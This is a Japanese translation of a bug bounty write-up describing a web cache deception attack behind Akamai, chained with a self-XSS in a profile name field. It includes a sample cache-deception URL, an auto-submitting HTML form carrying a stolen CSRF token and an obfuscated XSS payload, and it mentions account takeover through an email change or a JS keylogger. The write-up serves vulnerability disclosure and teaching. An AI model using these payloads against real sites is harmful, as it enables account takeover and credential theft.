ソース:
脆弱性:Cache Deception, Poisoning
訳:
それで、はるか昔の 7 月に、私はアプリのテストを開始し。
そのアプリが Akamai の背後にあることに気付き、その後アカウントを作成し、名前を更新するときに Self-XSS があることに気付いて。
したがって、これを悪用するには、キャッシュ可能な拡張ファイル (.js .css、woff2) を使用して変更された URL を被害者に送信して、ユーザーの CSRF トークンを抽出し、サーバーに保存するだけで済んで。
URL の例:
https://www.███████/my-account/personal-information.woff2?triagethis

CSRF トークンを抽出した後、XSS ペイロードを被害者に送信できて。
<html>
<body onload="xss.submit();">
<form method = "POST"
action = "https://www.█████████/my-account/update-profile"
id="xss"
style = "display:none">
<input type="hidden" name="CSRFToken" value="replace your stolen token here">
<input type="hidden" name="lname" value="Oauth">
<input type="hidden" name="zipcode" value="07801">
<input type="hidden" name="fname" value="xss","a":top[8680439..toString(30)](document.domain),//">
<input type="hidden" name="dobField" value="04/06/1994">
<input type="submit">
</form>
</body>
</html>
Payload Used:
xss”,”a”:top[8680439..toString(30)](document.domain),//
次に、このエクスプロイトでアカウント乗っ取りを実行するには 2 つの方法があることを示し。
1 つは、盗まれた CSRF で電子メールを変更し、新しいパスワードを要求するだけで。もう 1 つは、JS を使用して KeyLogger を使用してパスワードを抽出することで。
ペイロードは他の複数のページにあって。
ほなほな。